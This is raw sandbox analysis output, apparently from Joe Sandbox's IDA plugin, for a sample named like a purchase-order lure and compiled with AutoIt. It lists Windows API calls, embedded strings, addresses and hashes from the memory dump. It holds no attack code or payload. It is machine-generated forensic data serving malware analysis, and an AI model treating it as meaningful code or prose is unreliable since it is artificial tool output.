                                                                                                                                                                                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                      • API String ID: 2258743419-1018226102
                                                                                                                                                                                                      • Opcode ID: 1598bfaf1787faf1a90dafcec1d9463e001162d326762f6d733b4dea320e5d09
                                                                                                                                                                                                      • Instruction ID: 140721dde5c93db0a4831f506c98d94b1ca13cdcddd4f68ebbd5b188d2806d8f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1598bfaf1787faf1a90dafcec1d9463e001162d326762f6d733b4dea320e5d09
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3129171508341DFC724DF25C881AAFBBE5AF98308F40492FF589A3291DB38D949DB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046CEFB
                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 0046CF73
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0046CFF4
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0046D016
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D025
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0046D042
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0046D075
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D094
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0046D0A9
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0046D0B0
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0046D0C2
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0046D0DA
                                                                                                                                                                                                        • Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                      • API String ID: 3877571568-3619404913
                                                                                                                                                                                                      • Opcode ID: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
                                                                                                                                                                                                      • Instruction ID: 4dc2e84ce978025e6b17c84472f7ac8ce1a7427ed809a84a7c26ecdd8771ffc4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C71BF70A40305AFD720CF28CC85F6A77E5EB89708F14452EF985973A1E738E942CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0046F37A
                                                                                                                                                                                                        • Part of subcall function 0046D7DE: ClientToScreen.USER32(?,?), ref: 0046D807
                                                                                                                                                                                                        • Part of subcall function 0046D7DE: GetWindowRect.USER32(?,?), ref: 0046D87D
                                                                                                                                                                                                        • Part of subcall function 0046D7DE: PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F3EE
                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F411
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0046F441
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F458
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F471
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F488
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F4AA
                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 0046F4B1
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F59C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                                                                                                      • Opcode ID: 47b6dc680bd9822ee692f8695d8365c2bfff2efc646ddeb58e66cd6aff652795
                                                                                                                                                                                                      • Instruction ID: 542b244a70a4be53351f3959c13a29a11e7469c6b76638349d2aa62145188beb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b6dc680bd9822ee692f8695d8365c2bfff2efc646ddeb58e66cd6aff652795
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21613B71508304AFC301EF65DC85E9FBBF8EF89714F000A2EF595A21A1DB759A09CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0044AB3D
                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0044AB46
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0044AB52
                                                                                                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0044AC40
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044AC70
                                                                                                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0044AC9C
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0044AD4D
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000016), ref: 0044ADDF
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0044AE35
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0044AE44
                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0044AE80
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                                                                                                      • Opcode ID: 3ec11bc1e4838f0b829e0c870ea7914dbc6fb1c94dd58f1ac1f1bc445b56f708
                                                                                                                                                                                                      • Instruction ID: b7343743ca07c40412d491ea83dedac3c5837e075b3f85f41d6defa909029fd8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ec11bc1e4838f0b829e0c870ea7914dbc6fb1c94dd58f1ac1f1bc445b56f708
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7D11671A40205DBEB109F55C885BAEB7B5FF04700F18846BE5059B281DB3CEC66DB9B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 004671FC
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00467247
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                                                      • Opcode ID: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
                                                                                                                                                                                                      • Instruction ID: 62f23ba057e46a8cd31ddd049ddfa486710c51c13ab62974974121bb26b3cf57
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 319156742047019BCB04EF21C851A6EB7A1AF54318F10885FFC9667393EB38ED46DB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnumChildWindows.USER32(?,0043CF50), ref: 0043CE90
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                                                                                                      • String ID: 4+K$CLASS$CLASSNN$H+K$INSTANCE$L+K$NAME$P+K$REGEXPCLASS$T+K$TEXT
                                                                                                                                                                                                      • API String ID: 3555792229-3796589855
                                                                                                                                                                                                      • Opcode ID: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
                                                                                                                                                                                                      • Instruction ID: 2ed9d666b05899a5a0bbc8a2e6994f38106217aeede367c2b80ce34893bae7f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 109176706005069BCB18EF61C4C2BDAFB75BF08304F50952BD859B7291DF38699AD7D8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0046E5AB
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0046BEAF), ref: 0046E607
                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E647
                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E68C
                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E6C3
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0046BEAF), ref: 0046E6CF
                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046E6DF
                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,0046BEAF), ref: 0046E6EE
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0046E70B
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0046E717
                                                                                                                                                                                                        • Part of subcall function 00420FA7: __wcsicmp_l.LIBCMT ref: 00421030
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                                                                                                      • Opcode ID: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
                                                                                                                                                                                                      • Instruction ID: 362906a6200e291847826ad6f58851427a409ccbfe03941b9f9efc8c3e9874fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61D171900215FAEB14DF66CC46FBE77E8BB08724F10451BF911E61D1EBB8A980CB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0044D292
                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 0044D2DF
                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D327
                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D35E
                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D38C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                      • API String ID: 1148790751-4113822522
                                                                                                                                                                                                      • Opcode ID: 8005e5581cf771c0d9af6419e54f0eab00be8d88c1813a4392ffe3500980b3fb
                                                                                                                                                                                                      • Instruction ID: c2f07575d900e2cc802aa525a9fa0d83b75d0ad0639a96e5e284e948a2682b64
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8005e5581cf771c0d9af6419e54f0eab00be8d88c1813a4392ffe3500980b3fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F514F715043059FC700EF22D9819AEB7E4FF98718F10896EF88667291DB35EE05CB96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?), ref: 004426F1
                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00473973,00000016), ref: 004426FA
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?,00000016), ref: 0044271C
                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00473973,00000016), ref: 0044271F
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044276F
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00442780
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00442829
                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00442840
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                      • API String ID: 618562835-2268648507
                                                                                                                                                                                                      • Opcode ID: ddca5aea339f175024a2ecacea153a8960154b9753524d01ccea1f659a7ad99d
                                                                                                                                                                                                      • Instruction ID: b3eca28f86436021008a970bdb09a16546556c442e301ca44879bea502f66036
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddca5aea339f175024a2ecacea153a8960154b9753524d01ccea1f659a7ad99d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96413172800118AADB14FBD2DE86EEF7778AF54344F50017AB501760D2EA786F09CBA8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044D0D8
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0044D0FA
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0044D137
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0044D15C
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0044D17B
                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0044D1B7
                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0044D1EC
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0044D1F7
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0044D200
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0044D20A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                                                      • Opcode ID: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
                                                                                                                                                                                                      • Instruction ID: b8dacc7318c57a54b8e1dcc07a6608e13ec8875f8ad1fe94d440b818e94b2f45
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331B871900119ABDB21DFA1DC49FEF77BCEF88740F5040BAF909D11A1E77496458B28
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0046BEF4,?,?), ref: 0046E754
                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E76B
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E776
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E783
                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046E78C
                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E79B
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0046E7A4
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E7AB
                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046BEF4,?,?,00000000,?), ref: 0046E7BC
                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0048D9BC,?), ref: 0046E7D5
                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0046E7E5
                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0046E809
                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0046E834
